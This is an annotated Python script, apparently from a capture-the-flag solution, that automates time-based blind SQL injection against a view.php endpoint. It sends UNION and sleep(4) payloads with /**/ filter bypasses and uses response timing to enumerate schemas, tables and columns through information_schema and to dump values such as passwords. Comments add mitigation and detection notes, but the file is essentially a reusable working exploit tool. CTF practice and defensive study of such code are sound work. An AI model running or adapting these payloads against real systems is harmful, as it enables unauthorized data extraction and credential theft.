脚本

# encoding:utf-8
import hashlib
import requests
import re
import time
import string

# Module-level settings for the time-based blind SQL injection extractor
# below.  Server-side root cause (as this writeup's payloads assume): the
# `no` query parameter of view.php reaches a SQL statement unparameterized.
# Mitigation is a bound parameter / integer allow-list on `no`; on the
# detection side, bursts of requests to the same endpoint carrying
# `union`/`sleep(` and responses that cluster around the sleep(4) delay are
# the visible signature of this script.

# Alphabet brute-forced one position at a time (get() appends a few
# punctuation characters to it).
characters: str = string.ascii_letters + string.digits
# Exclusive upper bound on the number of character positions probed per value.
max_length: int = 200
# Base URL; the SQL payload is appended directly after `no=`.
target: str = 'http://1eb82f8a-5494-47fc-88af-8bdd6e607c1f.node3.buuoj.cn/view.php?no='

# Payload template for enumerating schema names.  {0} = 1-based character
# position, {1} = candidate character.  When the character matches, the
# server runs sleep(4); get() uses a 3 s client timeout, so a ReadTimeout is
# the "match" signal.  `/**/` stands in for every space (and
# `information_schema/**/./**/schemata` for `information_schema.schemata`),
# presumably to get past a filter on the challenge — that filter is not
# shown here.
cur_database: str = "-1/**/union/**/select 1,/**/(case/**/when/**/(mid((select/**/group_concat(schema_name/**/separator'@')/**/from/**/information_schema/**/./**/schemata)/**/from/**/{0}/**/for/**/1)='{1}')/**/then/**/sleep(4)/**/else/**/1/**/end),3,4-- -"


def get(payload: str) -> str | None:
    """Extract one string value character by character via a timing side channel.

    `payload` is a str.format template with two slots: {0} the 1-based
    character position and {1} the candidate character.  For every position
    each candidate is sent as a GET request to `target`; a request that
    outlives the 3-second client timeout (the payload's server-side sleep(4)
    fires on a match) is taken to mean "this candidate is correct".

    Returns the accumulated string as soon as a position yields no match,
    i.e. the end of the value.  If every position up to max_length-1
    matches, the loop finishes without a return and the function yields
    None; callers that concatenate the result would then raise TypeError.

    Only ReadTimeout is caught; any other requests exception (e.g.
    ConnectionError) propagates.  Ordinary network latency can also trip
    the 3 s timeout and be misread as a match.
    """
    flag = ''
    for i in range(1, max_length):
        next_position = False
        # Candidate set: letters/digits plus the punctuation the author
        # expects in the result.
        for char in characters+"_{}#-%();:":
            payload_ = payload.format(str(i), char)
            print("payload为:%s"%payload_)
            try:
                r = requests.get(target+payload_, timeout=3)
                r.encoding = 'utf-8'
                # print("response: %s" % r.text)
                # A prompt (non-matching) reply: short pause, then next candidate.
                time.sleep(0.1)
            except requests.exceptions.ReadTimeout:
                # The only success signal: the request exceeded the client
                # timeout, attributed to sleep(4) in the payload.
                flag += char
                print(flag)
                next_position = True
                break
        if not next_position:
            # No candidate matched at this position: end of the value.
            return flag


# 指定数据库,获取其下全部表名
def get_table(database: str) -> None:
    """Enumerate up to five table names in `database`, printing each one.

    Each iteration builds a payload whose inner subquery selects the i-th
    table_name from information_schema.tables (limit 1 offset i) and hands
    the template to get() for character-by-character extraction; get_col()
    is then called on the recovered name.  Stops early once get() returns
    an empty string (no further tables).

    `database` is spliced into the SQL text by string concatenation, so it
    must be a plain identifier; a value containing a quote breaks the query.
    """
    for i in range(0,5):
        print("正在查询数据库" + database + "中的表")
        payload = "-1 union/**/select 1, (case when (substring((" \
                 "select table_name from information_schema.tables where table_schema='"+ database + "' limit 1 offset "+ str(i) +") " \
                 "from {0} for 1)='{1}') " \
                 "then sleep(4) else 1 end),3,4-- -"
        table = get(payload)
        # If get() returned None (see its docstring) this concatenation
        # raises TypeError.
        print( "数据库" + database + "的第"+ str(i+1) +"个表"+table)
        # NOTE(review): runs before the emptiness check below, so the final
        # (empty) iteration still issues a column lookup for table_name=''.
        get_col(table)

        if not table:
            print('数据库'+database+'中的表查询完毕')
            break

# 查字段
def get_col(table: str) -> None:
    """Enumerate up to five column names of `table`, printing each one.

    Same scheme as get_table(): the i-th column_name from
    information_schema.columns (limit 1 offset i) is extracted by get().
    Names found so far are accumulated in `columns` (space-separated) and
    printed together when an empty name ends the enumeration.

    `table` is concatenated into the SQL text unescaped, so it must be a
    plain identifier.
    """
    columns = "";
    for i in range(0, 5):
        print("正在查询表" + table + "中的字段")
        payload = "-1 union/**/select 1,( case when (substring((" \
              "select column_name from information_schema.columns where table_name='"+ table +"' limit 1 offset "+ str(i) +") " \
              "from {0} for 1)='{1}') " \
              "then sleep(4) else 1 end),3,4-- -"
        column = get(payload)
        # A None from get() (all positions matched) makes this raise TypeError.
        print("表" + table + "的第" + str(i+1) + "个字段为" + column )
        # print(column)
        columns+=column+'   '
        if not column:
            print("表" + table + "中的字段查询完毕   " + columns)
            break


# 作为单独的模块使用吧,获取字段详细信息
def result(column: str, table: str) -> None:
    """Print up to five row values of `column` from `table` (one get() per row).

    Intended to be run on its own once a table and column are known.  Its
    payload differs from the others: it closes a single-quoted string
    (`-1'and ...`) and ends in a `#` comment instead of `-- -`, so it
    assumes a different injection context than get_table()/get_col() — the
    writeup does not say which endpoint it was written for.  Both arguments
    are concatenated into the SQL text unescaped.
    """
    for i in range(0, 5):
        payload = "-1'and (select case when (substring((select "+column+" from "+table+" limit 1 offset " + str(i)+ ") from {0} for 1)='{1}') " \
          "then sleep(4) else 1 end) #"
        print(get(payload))


if __name__ == "__main__":
    # Entry point as the author left it: the schema-enumeration step
    # (cur_database) and the row-dump step (result()) are commented out;
    # only table/column enumeration of the 'fakebook' database runs.
    #database1 = get(cur_database)
    table1 = get_table('fakebook')  # always None: get_table() returns nothing
    #result("password", "user")
